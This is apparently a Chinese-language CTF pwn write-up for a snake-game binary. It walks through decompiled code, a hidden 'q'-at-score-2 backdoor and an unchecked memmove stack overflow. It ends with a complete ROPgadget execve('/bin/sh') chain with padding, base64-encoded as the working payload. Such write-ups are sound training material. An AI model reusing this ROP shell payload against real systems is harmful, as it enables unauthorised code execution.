pwn题 snake writeup
多少有点不自信,太久没做题,看到题都有点怕怕的
这个程序是一个贪食蛇游戏,主程序如下:
/*
 * Decompiler (IDA) pseudocode of the game loop. Renamed symbols
 * (print_score_400E09, score_dword_6BD3F0, binsh_401427) are the
 * author's; the rest are raw decompiler names.
 *
 * Security-relevant path: the only call to binsh_401427 is in the
 * 'q' case and is guarded by `score_dword_6BD3F0 == 2`, so reaching the
 * vulnerable function requires a score of exactly 2 followed by 'q'.
 * Note that 'q' is case-sensitive here while the movement keys are not.
 *
 * v2..v5 are passed to print_score_400E09 without ever being assigned;
 * this is most likely a decompiler artifact for register arguments
 * (edx/ecx/r8/r9) rather than real program logic — confirm in the
 * disassembly before treating it as a bug.
 */
__int64 __fastcall main_4015A5(__int64 a1, __int64 a2)
{
    int v2; // edx
    int v3; // ecx
    int v4; // er8
    int v5; // er9
    int v7; // [rsp+Ch] [rbp-4h]

    sub_400B6D(); // one-time setup (board/terminal) — not shown on this page
    do
    {
LABEL_2:
        sub_40158D();
        sub_400CA6();
        print_score_400E09(a1, a2, v2, v3, v4, v5);
        v7 = getchar(); // -1 (EOF / no input) keeps redrawing
    }
    while ( v7 == -1 );
    /*
     * dword_6BEE04 is the current heading: W=0, D=1, S=2, A=3. Each key
     * refuses the value that is the exact opposite of the current heading
     * (e.g. 'a' is ignored while heading is 1 = D), which looks like the
     * usual "cannot reverse into yourself" rule.
     */
    switch ( v7 )
    {
        case 'A':
        case 'a':
            if ( dword_6BEE04 != 1 )
                dword_6BEE04 = 3;
            goto LABEL_16;
        case 'D':
        case 'd':
            if ( dword_6BEE04 != 3 )
                dword_6BEE04 = 1;
            goto LABEL_16;
        case 'S':
        case 's':
            if ( dword_6BEE04 )
                dword_6BEE04 = 2;
            goto LABEL_16;
        case 'W':
        case 'w':
            if ( dword_6BEE04 != 2 )
                dword_6BEE04 = 0;
            goto LABEL_16;
        case 'q':
            // Hidden branch: quitting with a score of exactly 2 enters the
            // backdoor function instead of returning (backdoor).
            if ( score_dword_6BD3F0 == 2 )
                binsh_401427();
            return 0LL;
        default:
LABEL_16:
            sub_400E29(); // advance the snake
            if ( !(unsigned int)sub_400EDF() ) // non-zero presumably means collision — verify
            {
                // Score increments when these two globals match
                // (presumably head position == food position — not shown here).
                if ( qword_6BE4A0[0] == qword_6BE480 )
                {
                    ++score_dword_6BD3F0;
                    ++dword_6BEE00;
                    sub_4014A7();
                }
                a1 = 100000LL;
                usleep(0x186A0u); // 100 ms frame delay
                goto LABEL_2;
            }
            IO_puts("Game Over!");
            return 0LL;
    }
}
根据这段代码可以知道,当得分为2时,输入q退出就会进入后门。
后门程序如下:
/*
 * Decompiler pseudocode of the backdoor reached from main's 'q' case.
 *
 * Vulnerability (stack-based buffer overflow, CWE-121): up to 0x400 bytes
 * are read into buf (sized exactly 0x400, so the read itself is bounded),
 * the data is base64-decoded by b64decode_40117D — which appears to return
 * a pointer to the decoded bytes and write the decoded length through &v1 —
 * and then v1 bytes are memmove'd into v3, a 104-byte stack array, with no
 * comparison against sizeof v3. Because the decoded length is derived from
 * attacker-controlled input, the copy can run past v3 into the saved frame.
 *
 * The fix is a bound on the copy length before memmove (reject or clamp
 * when v1 > sizeof v3); a stack canary or FORTIFY-style checked memmove
 * would also turn the overflow into an abort instead of control-flow
 * hijack. The return value of _libc_read is ignored and buf is not
 * NUL-terminated after the read — harmless only if the decoder honours
 * the explicit length, which cannot be confirmed from this page.
 */
__int64 binsh_401427()
{
    int v1; // [rsp+Ch] [rbp-474h] BYREF
    char buf[1024]; // [rsp+10h] [rbp-470h] BYREF
    char v3[104]; // [rsp+410h] [rbp-70h] BYREF
    __int64 v4; // [rsp+478h] [rbp-8h]

    IO_puts("?www!dev#etc$/bin/sh");
    IO_fflush(off_6BB868);
    getchar(); // consumes the newline left over from main's getchar()
    _libc_read(0, buf, 0x400uLL); // bounded by buf's size; return value unchecked
    v4 = b64decode_40117D((__int64)buf, &v1); // v4 = decoded data, v1 = decoded length (inferred)
    // Copies v1 bytes from v4 into v3 — v1 is not checked against sizeof v3 (104),
    // so this is the overflow.
    return j___libc_memmove_ifunc_0((__int64)v3, v4, v1);
}
这里先打印"?www!dev#etc$/bin/sh",然后读取最多0x400个字符到buf,然后经过base64解码(这里可以通过输入一些base64字符串看出),然后把解码后的v1个字节拷贝到只有104字节的v3,拷贝长度没有任何检查,所以这里是存在栈溢出的。
然后ROPgadget一把梭
ROPgadget --binary pwn --ropchain
选取payload
#!/usr/bin/env python3
# execve generated by ROPgadget
#
# Payload for the stack overflow in binsh_401427 (see the decompiled
# function above). Every address in the chain is absolute (0x40xxxx code,
# 0x6bxxxx .data), which only works because the target appears to be a
# static, non-PIE binary — check with `readelf -h` / checksec. Building with
# PIE (so ASLR moves the gadgets) or with stack protector (so the canary is
# clobbered before the return address is reached) would defeat this chain;
# the real fix is bounding the memmove length in binsh_401427.
from struct import pack
# Padding goes here
p = b''
# Store "/bin//sh" followed by a NULL qword in .data, then point rdi at it
# with rsi = rdx = address of the NULL qword (argv/envp).
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e0) # @ .data
p += pack('<Q', 0x00000000004005af) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x0000000000480bb1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x00000000004458a0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000480bb1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004006a6) # pop rdi ; ret
p += pack('<Q', 0x00000000006bb0e0) # @ .data
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x000000000044cb86) # pop rdx ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
# ROPgadget had no "pop rax" with a usable constant, so it builds the
# syscall number by zeroing rax and applying the same "add rax, 1" gadget
# repeatedly (59 times below).
p += pack('<Q', 0x00000000004458a0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401dac) # syscall
from base64 import b64encode
# 120 filler bytes: the overflow of v3[104] in binsh_401427 runs past the
# rest of the frame up to the saved return address, which the chain then
# replaces. A stack canary in that frame would be overwritten here and abort.
payload = b'a'*120 + p
# binsh_401427 base64-decodes its input before the memmove, so the raw chain
# has to be sent encoded. Note print() on bytes shows the b'...' repr; the
# author presumably pastes only the text inside the quotes.
print(b64encode(payload))